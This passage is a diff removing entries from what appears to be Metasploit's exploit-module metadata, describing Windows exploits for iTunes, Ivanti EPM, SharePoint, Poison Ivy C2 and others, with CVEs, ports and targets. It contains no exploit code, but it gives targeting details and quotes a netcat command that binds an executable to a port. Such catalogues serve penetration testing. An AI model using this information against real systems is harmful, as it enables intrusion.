Authentication is not required in order to exploit this vulnerability.", - "references": [ - "CVE-2015-7450", - "URL-https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java", - "URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability", - "URL-https://www.tenable.com/plugins/index.php?view=single&id=87171" - ], - "platform": "Windows", - "arch": "", - "rport": "8880", - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "IBM WebSphere 7.0.0.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_websphere_java_deserialize", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/itunes_extm3u_bof": { - "name": "Apple iTunes 10 Extended M3U Stack Buffer Overflow", - "fullname": "exploit/windows/misc/itunes_extm3u_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-21", - "type": "exploit", - "author": [ - "Rh0 ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.\n When opening an extended .m3u file containing an \"#EXTINF:\" tag description,\n iTunes will copy the content after \"#EXTINF:\" without appropriate checking\n from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,\n which allows code execution under the context of the user.\n\n Please note before using this exploit, you must have precise knowledge of the\n victim machine's QuickTime version (if installed), and then select your target\n accordingly.\n\n In addition, even though this exploit can be used as remote, you 
should be aware\n the victim's browser behavior when opening an itms link. For example,\n IE/Firefox/Opera by default will ask the user for permission before launching the\n itms link by iTunes. Chrome will ask for permission, but also spits a warning.\n Safari would be an ideal target, because it will open the link without any\n user interaction.", - "references": [ - "OSVDB-83220", - "EDB-19322", - "URL-http://pastehtml.com/view/c25uhk4ab.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3", - "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3", - "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3", - "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/itunes_extm3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/itunes_extm3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ivanti_agent_portal_cmdexec": { - "name": "Ivanti EPM Agent Portal Command Execution", - "fullname": "exploit/windows/misc/ivanti_agent_portal_cmdexec", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-06-07", - "type": "exploit", - "author": [ - "James Horseman", - "Zach Hanley", - "Spencer McIntyre" - ], - "description": "This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method\n which will run an attacker-specified string on the remote target as NT AUTHORITY\\SYSTEM.\n This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.", - "references": [ - "CVE-2023-28324", - "URL-https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US", - 
"URL-https://github.com/horizon3ai/CVE-2023-28324" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2024-11-20 13:51:39 +0000", - "path": "/modules/exploits/windows/misc/ivanti_agent_portal_cmdexec.rb", - "is_install_path": true, - "ref_name": "windows/misc/ivanti_agent_portal_cmdexec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ivanti_avalanche_mdm_bof": { - "name": "Ivanti Avalanche MDM Buffer Overflow", - "fullname": "exploit/windows/misc/ivanti_avalanche_mdm_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-14", - "type": "exploit", - "author": [ - "Ege BALCI egebalci ", - "A researcher at Tenable" - ], - "description": "This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.\n An attacker can send a specially crafted message to the Wavelink Avalanche Manager,\n which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.\n This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.\n The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.\n Upon successful exploitation the attacker gains full access to the target system.\n\n This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.", - "references": [ - "CVE-2023-32560", - "URL-https://www.tenable.com/security/research/tra-2023-27", - "URL-https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1" - ], - "platform": "Windows", - "arch": "x86", - "rport": 1777, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Ivanti Avalanche <= v6.4.0.0" - ], - 
"mod_time": "2023-09-04 16:46:14 +0000", - "path": "/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/ivanti_avalanche_mdm_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/landesk_aolnsrvr": { - "name": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", - "fullname": "exploit/windows/misc/landesk_aolnsrvr", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-04-13", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n an overly long string to the Alert Service, a buffer is overwritten and arbitrary\n code can be executed.", - "references": [ - "CVE-2007-1674", - "OSVDB-34964", - "URL-http://www.tippingpoint.com/security/advisories/TSRT-07-04.html" - ], - "platform": "Windows", - "arch": "", - "rport": 65535, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Alerting Proxy 2000/2003/XP", - "Alerting Proxy 2003 SP1-2 (NX support)", - "Alerting Proxy XP SP2 (NX support)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/landesk_aolnsrvr.rb", - "is_install_path": true, - "ref_name": "windows/misc/landesk_aolnsrvr", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/lianja_db_net": { - "name": "Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow", - "fullname": "exploit/windows/misc/lianja_db_net", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-22", - "type": "exploit", - "author": [ - "Spencer McIntyre" - ], - "description": "This module exploits a stack buffer 
overflow in the db_netserver process, which\n is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.", - "references": [ - "CVE-2013-3563", - "OSVDB-93759" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2", - "Lianja SQL 1.0.0RC5.1 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/lianja_db_net.rb", - "is_install_path": true, - "ref_name": "windows/misc/lianja_db_net", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/manageengine_eventlog_analyzer_rce": { - "name": "ManageEngine EventLog Analyzer Remote Code Execution", - "fullname": "exploit/windows/misc/manageengine_eventlog_analyzer_rce", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-07-11", - "type": "exploit", - "author": [ - "xistence " - ], - "description": "This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6\n build 10060 and previous versions. Every authenticated user, including the default \"guest\"\n account can execute SQL queries directly on the underlying Postgres database server. The\n queries are executed as the \"postgres\" user which has full privileges and thus is able to\n write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM\n privileges on the web server. 
This module has been tested successfully on ManageEngine\n EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.", - "references": [ - "EDB-38173", - "CVE-2015-7387", - "URL-https://seclists.org/fulldisclosure/2015/Sep/59" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8400, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/manageengine_eventlog_analyzer_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/mercury_phonebook": { - "name": "Mercury/32 PH Server Module Buffer Overflow", - "fullname": "exploit/windows/misc/mercury_phonebook", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-12-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack-based buffer overflow in\n Mercury/32 <= v4.01b PH Server Module. 
This issue is\n due to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.", - "references": [ - "CVE-2005-4411", - "OSVDB-22103", - "BID-16396" - ], - "platform": "Windows", - "arch": "", - "rport": 105, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP0/SP1 English", - "Windows 2000 Pro English ALL" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/mercury_phonebook.rb", - "is_install_path": true, - "ref_name": "windows/misc/mercury_phonebook", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/mini_stream": { - "name": "Mini-Stream 3.0.1.1 Buffer Overflow", - "fullname": "exploit/windows/misc/mini_stream", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-12-25", - "type": "exploit", - "author": [ - "Unknown", - "Ron Henry " - ], - "description": "This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1\n By creating a specially crafted pls file, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2009-5109", - "OSVDB-61341", - "EDB-10745" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 ENG", - "Windows XP SP2 ENG" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/mini_stream.rb", - "is_install_path": true, - "ref_name": "windows/misc/mini_stream", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/mirc_privmsg_server": { - "name": "mIRC PRIVMSG Handling Stack Buffer Overflow", - "fullname": "exploit/windows/misc/mirc_privmsg_server", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-02", 
- "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.\n By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG\n command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads\n may be necessary. This module is based on the code by SkD.", - "references": [ - "CVE-2008-4449", - "OSVDB-48752", - "BID-31552", - "EDB-6666" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/mirc_privmsg_server.rb", - "is_install_path": true, - "ref_name": "windows/misc/mirc_privmsg_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/mobile_mouse_rce": { - "name": "Mobile Mouse RCE", - "fullname": "exploit/windows/misc/mobile_mouse_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-09-20", - "type": "exploit", - "author": [ - "h00die", - "CHOKRI HAMMEDI" - ], - "description": "This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol\n to deploy a payload and run it from the server. 
This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.6.0.4, current at the time of module writing", - "references": [ - "EDB-51010", - "URL-https://mobilemouse.com/" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 9099, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "default" - ], - "mod_time": "2022-09-27 14:51:03 +0000", - "path": "/modules/exploits/windows/misc/mobile_mouse_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/mobile_mouse_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/ms07_064_sami": { - "name": "MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow", - "fullname": "exploit/windows/misc/ms07_064_sami", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-12-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the DirectShow Synchronized\n Accessible Media Interchanged (SAMI) parser in quartz.dll. 
This module\n has only been tested with Windows Media Player (6.4.09.1129) and\n DirectX 8.0.", - "references": [ - "CVE-2007-3901", - "OSVDB-39126", - "MSB-MS07-064", - "BID-26789" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ms07_064_sami.rb", - "is_install_path": true, - "ref_name": "windows/misc/ms07_064_sami", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ms10_104_sharepoint": { - "name": "MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution", - "fullname": "exploit/windows/misc/ms10_104_sharepoint", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-12-14", - "type": "exploit", - "author": [ - "Oleksandr Mirosh", - "James Burton", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in SharePoint Server 2007 SP2. 
The\n software contains a directory traversal, that allows a remote attacker to write\n arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile\n request to the Office Document Conversions Launcher Service, which results in code\n execution under the context of 'SYSTEM'.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers.\n It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows\n 2003 SP2.", - "references": [ - "CVE-2010-3964", - "OSVDB-69817", - "BID-45264", - "MSB-MS10-104", - "ZDI-10-287" - ], - "platform": "Windows", - "arch": "", - "rport": 8082, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/misc/ms10_104_sharepoint.rb", - "is_install_path": true, - "ref_name": "windows/misc/ms10_104_sharepoint", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/netcat110_nt": { - "name": "Netcat v1.10 NT Stack Buffer Overflow", - "fullname": "exploit/windows/misc/netcat110_nt", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-12-27", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending\n an overly long string we are able to overwrite SEH. 
The vulnerability\n exists when netcat is used to bind (-e) an executable to a port in doexec.c.\n This module tested successfully using \"c:\\>nc -L -p 31337 -e ftp\".", - "references": [ - "CVE-2004-1317", - "OSVDB-12612", - "BID-12106", - "EDB-726" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal nc.exe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/netcat110_nt.rb", - "is_install_path": true, - "ref_name": "windows/misc/netcat110_nt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/nettransport": { - "name": "NetTransport Download Manager 2.90.510 Buffer Overflow", - "fullname": "exploit/windows/misc/nettransport", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-02", - "type": "exploit", - "author": [ - "Lincoln", - "dookie" - ], - "description": "This exploits a stack buffer overflow in NetTransport Download Manager,\n part of the NetXfer suite. 
This module was tested\n successfully against version 2.90.510.", - "references": [ - "CVE-2017-17968", - "OSVDB-61435", - "EDB-10911" - ], - "platform": "Windows", - "arch": "", - "rport": 22222, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/nettransport.rb", - "is_install_path": true, - "ref_name": "windows/misc/nettransport", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/nvidia_mental_ray": { - "name": "Nvidia Mental Ray Satellite Service Arbitrary DLL Injection", - "fullname": "exploit/windows/misc/nvidia_mental_ray", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-12-10", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Donato Ferrante", - "Ben Campbell " - ], - "description": "The Nvidia Mental Ray Satellite Service listens for control commands on port 7414.\n When it receives the command to load a DLL (via an UNC path) it will try to\n connect back to the host on port 7514. If a TCP connection is successful it will\n then attempt to load the DLL. 
This module has been tested successfully on Win7 x64\n with Nvidia Mental Ray Satellite Service v3.11.1.", - "references": [ - "URL-http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf", - "OSVDB-100827" - ], - "platform": "Windows", - "arch": "", - "rport": 7414, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/nvidia_mental_ray.rb", - "is_install_path": true, - "ref_name": "windows/misc/nvidia_mental_ray", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/plugx": { - "name": "PlugX Controller Stack Buffer Overflow", - "fullname": "exploit/windows/misc/plugx", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-07-27", - "type": "exploit", - "author": [ - "Professor Plum" - ], - "description": "This module exploits a stack buffer overflow in the PlugX Controller (C2 server).", - "references": [], - "platform": "Windows", - "arch": "", - "rport": 13579, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "PlugX Type I (old)", - "PlugX Type I", - "PlugX Type II" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/misc/plugx.rb", - "is_install_path": true, - "ref_name": "windows/misc/plugx", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/poisonivy_21x_bof": { - "name": "Poison Ivy 2.1.x C2 Buffer Overflow", - "fullname": "exploit/windows/misc/poisonivy_21x_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-06-03", - "type": "exploit", - "author": [ - "Jos Wetzels" - ], - "description": "This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.\n The exploit does not need to know the password chosen for the bot/server 
communication.", - "references": [ - "URL-http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware" - ], - "platform": "Windows", - "arch": "", - "rport": 3460, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Poison Ivy 2.1.4 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/poisonivy_21x_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/poisonivy_21x_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/poisonivy_bof": { - "name": "Poison Ivy Server Buffer Overflow", - "fullname": "exploit/windows/misc/poisonivy_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-24", - "type": "exploit", - "author": [ - "Andrzej Dereszowski", - "Gal Badishi", - "juan vazquez ", - "Jos Wetzels" - ], - "description": "This module exploits a stack buffer overflow in the Poison Ivy 2.2.0 to 2.3.2 C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.", - "references": [ - "OSVDB-83774", - "EDB-19613", - "URL-http://www.signal11.eu/en/research/articles/targeted_2010.pdf", - "URL-http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/" - ], - "platform": "Windows", - "arch": "", - "rport": 3460, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1", - "Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1", - "Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/poisonivy_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/poisonivy_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/misc/poppeeper_date": { - "name": "POP Peeper v3.4 DATE Buffer Overflow", - "fullname": "exploit/windows/misc/poppeeper_date", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted DATE string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.", - "references": [ - "CVE-2009-1029", - "OSVDB-53560", - "BID-34093" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "POP Peeper v3.4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/poppeeper_date.rb", - "is_install_path": true, - "ref_name": "windows/misc/poppeeper_date", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/poppeeper_uidl": { - "name": "POP Peeper v3.4 UIDL Buffer Overflow", - "fullname": "exploit/windows/misc/poppeeper_uidl", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted UIDL string is sent to a client,\n an attacker may be able to execute arbitrary code. 
This\n module is based off of krakowlabs code.", - "references": [ - "OSVDB-53559", - "CVE-2009-1029", - "BID-33926" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "POP Peeper v3.4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/poppeeper_uidl.rb", - "is_install_path": true, - "ref_name": "windows/misc/poppeeper_uidl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/realtek_playlist": { - "name": "Realtek Media Player Playlist Buffer Overflow", - "fullname": "exploit/windows/misc/realtek_playlist", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-12-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.\n When a Realtek Media Player client opens a specially crafted playlist, an\n attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-5664", - "OSVDB-50715", - "BID-32860" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Realtek Media Player(RtlRack) A4.06 (XP Pro All English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/realtek_playlist.rb", - "is_install_path": true, - "ref_name": "windows/misc/realtek_playlist", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/remote_control_collection_rce": { - "name": "Remote Control Collection RCE", - "fullname": "exploit/windows/misc/remote_control_collection_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-09-20", - "type": "exploit", - "author": [ - "h00die", - "H4rk3nz0" - ], - 
"description": "This module utilizes the Remote Control Server's, part\n of the Remote Control Collection by Steppschuh, protocol\n to deploy a payload and run it from the server. This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.1.1.12, current at the time of module writing", - "references": [ - "URL-http://remote-control-collection.com", - "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 1926, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "default" - ], - "mod_time": "2022-10-28 15:03:39 +0000", - "path": "/modules/exploits/windows/misc/remote_control_collection_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/remote_control_collection_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/remote_mouse_rce": { - "name": "Remote Mouse RCE", - "fullname": "exploit/windows/misc/remote_mouse_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-04-15", - "type": "exploit", - "author": [ - "h00die", - "0RPHON", - "H4rk3nz0" - ], - "description": "This module utilizes the Remote Mouse Server by Emote Interactive protocol\n to deploy a payload and run it from the server on versions < 4.200 (500 server response).\n This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 4.110, current at the time of module writing", - "references": [ - "EDB-46697", - "CVE-2022-3365", - "URL-https://www.remotemouse.net/", - "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py" - ], 
- "platform": "Windows", - "arch": "x64, x86", - "rport": 1978, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "default" - ], - "mod_time": "2022-10-17 15:30:17 +0000", - "path": "/modules/exploits/windows/misc/remote_mouse_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/remote_mouse_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/sap_2005_license": { - "name": "SAP Business One License Manager 2005 Buffer Overflow", - "fullname": "exploit/windows/misc/sap_2005_license", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-08-01", - "type": "exploit", - "author": [ - "Jacopo Cervini" - ], - "description": "This module exploits a stack buffer overflow in the SAP Business One 2005\n License Manager 'NT Naming Service' A and B releases. 
By sending an\n excessively long string the stack is overwritten enabling arbitrary\n code execution.", - "references": [ - "OSVDB-56837", - "CVE-2009-4988", - "BID-35933", - "EDB-9319" - ], - "platform": "Windows", - "arch": "", - "rport": 30000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Sap Business One 2005 B1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/sap_2005_license.rb", - "is_install_path": true, - "ref_name": "windows/misc/sap_2005_license", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/sap_netweaver_dispatcher": { - "name": "SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow", - "fullname": "exploit/windows/misc/sap_netweaver_dispatcher", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-08", - "type": "exploit", - "author": [ - "Martin Gallo", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher\n service. The overflow occurs in the DiagTraceR3Info() function and allows a remote\n attacker to execute arbitrary code by supplying a special crafted Diag packet. The\n Dispatcher service is only vulnerable if the Developer Traces have been configured\n at levels 2 or 3. 
